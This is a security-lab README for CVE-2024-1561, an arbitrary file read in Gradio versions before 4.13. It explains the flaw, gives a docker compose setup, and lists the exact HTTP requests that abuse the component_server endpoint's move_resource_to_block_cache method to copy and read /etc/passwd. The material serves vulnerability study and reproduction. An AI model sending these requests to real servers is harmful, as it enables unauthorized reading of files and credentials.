# Gradio Arbitrary File Read (CVE-2024-1561) [中文版本(Chinese version)](README.zh-cn.md) Gradio is a Python library that enables users to rapidly build web-based interfaces for machine learning models without writing any front-end code. In Gradio versions prior to 4.13, the `component_server` endpoint allows attackers to invoke arbitrary methods of the `Component` class. By abusing the `move_resource_to_block_cache` method, an attacker can copy any file from the server to a temporary directory and then retrieve its contents, leading to arbitrary file read. References: - - ## Environment Setup Execute the following command to start an application written by Gradio 4.12.0: ``` docker compose up -d ``` After the environment is started, authentication is not enabled by default. You can access the application through `http://your-ip:7860`. ## Vulnerability Reproduction First, access the `/config` endpoint to obtain a component's `id` value, such as `3`. ``` GET /config HTTP/1.1 Host: 127.0.0.1:7860 ``` ![](1.png) Next, use the `move_resource_to_block_cache` method to copy `/etc/passwd` to a temporary directory. The response will include the temporary file path. ``` POST /component_server HTTP/1.1 Host: 127.0.0.1:7860 Content-Type: application/json { "component_id": "3", "data": "/etc/passwd", "fn_name": "move_resource_to_block_cache", "session_hash": "aaaaaaaaaaa" } ``` ![](2.png) Finally, access the `/file` endpoint with the returned path to read the file content. ``` GET /file=/tmp/gradio/916eb712d668cf14a35adf8179617549780c4070/passwd HTTP/1.1 Host: 127.0.0.1:7860 ``` ![](3.png) If successful, the contents of `/etc/passwd` will be displayed, demonstrating arbitrary file read.